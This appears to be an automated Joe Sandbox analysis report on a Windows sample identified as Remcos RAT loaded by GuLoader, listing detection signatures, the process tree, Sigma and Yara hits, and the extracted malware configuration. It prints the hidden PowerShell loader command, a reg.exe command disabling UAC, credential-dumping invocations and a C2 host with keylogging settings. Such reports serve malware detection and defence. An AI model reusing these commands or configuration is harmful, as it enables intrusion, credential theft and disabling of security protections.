Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Cp91KTtA1I.exe

Overview

General Information

Sample name:Cp91KTtA1I.exe
renamed because original name is a hash value
Original sample name:31e027003d640a1598d0e0501bebb595ea9407d74dbbc11e9d8a0779008b6eef.exe
Analysis ID:1471677
MD5:3785429894a5a55d22e27a398a8d71e5
SHA1:ff427e205d09bde3c5ecbe65c986edfdcddb5efb
SHA256:31e027003d640a1598d0e0501bebb595ea9407d74dbbc11e9d8a0779008b6eef
Tags:exe
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Disables UAC (registry)
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Powershell drops PE file
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Use Short Name Path in Command Line
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry

Classification

  • System is w10x64
  • Cp91KTtA1I.exe (PID: 7260 cmdline: "C:\Users\user\Desktop\Cp91KTtA1I.exe" MD5: 3785429894A5A55D22E27A398A8D71E5)
    • powershell.exe (PID: 7336 cmdline: "powershell.exe" -windowstyle hidden "$Aksemagters=Get-Content 'C:\Users\user\AppData\Local\kilns\Unobtainably\Psychrometres.Tel';$Soonerdog=$Aksemagters.SubString(4665,3);.$Soonerdog($Aksemagters)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Programdirektrer.exe (PID: 7880 cmdline: "C:\Users\user~1\AppData\Local\Temp\Programdirektrer.exe" MD5: 3785429894A5A55D22E27A398A8D71E5)
        • cmd.exe (PID: 8060 cmdline: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 8084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 8124 cmdline: C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • Programdirektrer.exe (PID: 5484 cmdline: C:\Users\user~1\AppData\Local\Temp\Programdirektrer.exe /stext "C:\Users\user\AppData\Local\Temp\nkgriyijgstgfl" MD5: 3785429894A5A55D22E27A398A8D71E5)
        • Programdirektrer.exe (PID: 2964 cmdline: C:\Users\user~1\AppData\Local\Temp\Programdirektrer.exe /stext "C:\Users\user\AppData\Local\Temp\xeukirtluallizflkm" MD5: 3785429894A5A55D22E27A398A8D71E5)
        • Programdirektrer.exe (PID: 2992 cmdline: C:\Users\user~1\AppData\Local\Temp\Programdirektrer.exe /stext "C:\Users\user\AppData\Local\Temp\igzujjdfqjdysfbpbxskn" MD5: 3785429894A5A55D22E27A398A8D71E5)
  • svchost.exe (PID: 7184 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": "a458386d9.duckdns.org:3256:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-7CSH4D", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
00000006.00000002.2574594742.0000000004456000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000006.00000002.2574594742.0000000004473000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000002.00000002.1871897756.000000000A6B6000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: Programdirektrer.exe PID: 7880JoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
          Process Memory Space: Programdirektrer.exe PID: 7880JoeSecurity_RemcosYara detected Remcos RATJoe Security
            Click to see the 1 entries

            System Summary

            barindex
            Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\Programdirektrer.exe", CommandLine: "C:\Users\user~1\AppData\Local\Temp\Programdirektrer.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\Programdirektrer.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\Programdirektrer.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\Programdirektrer.exe, ParentCommandLine: "powershell.exe" -windowstyle hidden "$Aksemagters=Get-Content 'C:\Users\user\AppData\Local\kilns\Unobtainably\Psychrometres.Tel';$Soonerdog=$Aksemagters.SubString(4665,3);.$Soonerdog($Aksemagters)", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7336, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\Programdirektrer.exe", ProcessId: 7880, ProcessName: Programdirektrer.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Aksemagters=Get-Content 'C:\Users\user\AppData\Local\kilns\Unobtainably\Psychrometres.Tel';$Soonerdog=$Aksemagters.SubString(4665,3);.$Soonerdog($Aksemagters)", CommandLine: "powershell.exe" -windowstyle hidden "$Aksemagters=Get-Content 'C:\Users\user\AppData\Local\kilns\Unobtainably\Psychrometres.Tel';$Soonerdog=$Aksemagters.SubString(4665,3);.$Soonerdog($Aksemagters)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Cp91KTtA1I.exe", ParentImage: C:\Users\user\Desktop\Cp91KTtA1I.exe, ParentProcessId: 7260, ParentProcessName: Cp91KTtA1I.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Aksemagters=Get-Content 'C:\Users\user\AppData\Local\kilns\Unobtainably\Psychrometres.Tel';$Soonerdog=$Aksemagters.SubString(4665,3);.$Soonerdog($Aksemagters)", ProcessId: 7336, ProcessName: powershell.exe
            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7184, ProcessName: svchost.exe

            Stealing of Sensitive Information

            barindex